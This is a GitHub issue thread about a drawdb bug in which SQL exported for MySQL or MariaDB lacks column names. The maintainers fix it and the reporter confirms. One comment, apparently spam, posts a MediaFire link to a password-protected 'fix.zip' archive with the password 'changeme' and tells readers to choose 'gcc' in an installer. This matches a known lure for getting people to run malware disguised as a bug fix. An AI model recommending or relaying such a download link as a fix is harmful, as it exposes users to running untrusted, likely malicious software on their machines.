### ISSUE TITLE
[BUG] exported sql file contains no column names with mysql or mariaDB as database

### ISSUE THREAD

**Issue by Martian101** [drawdb-io/drawdb#233]
**Describe the bug**
sql exported without column names

**To Reproduce**
1. Go to File -> New -> Blank
2. choose Mysql as Database
3. create new table and edit the schema
4. export the edited schema as sql file
5. See error

**Expected behavior**
export proper sql script file based on the table schema

**Screenshots**
the schema I create for illustration
![image](https://github.com/user-attachments/assets/aa7fc19f-ed6c-4d66-afcb-70a79088b1c0)
When try to export the schema as sql, it returns sql script without column names:
![image](https://github.com/user-attachments/assets/b04b98ee-38bd-443b-bd4a-dfa2509a5ed0)

**Desktop (please complete the following information):**
 - OS: macOS monterey 12.5.1
 - Browser: Chrome Version 128.0.6613.84 (Official Build) (arm64)

**Additional context**
The problem only exists when I choose mysql or mariaDB as database, It works perfectly when I choose others.Even the generic database works fine, I can still export to mysql script file.

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 1ilit** [comment]
Fixed it for mysql but cant reproduce for mariadb

**Comment by Martian101** [comment]
> Fixed it for mysql but cant reproduce for mariadb

it works both for mysql and mariadb now, thanks !

**Comment by 1ilit** [comment]
Great
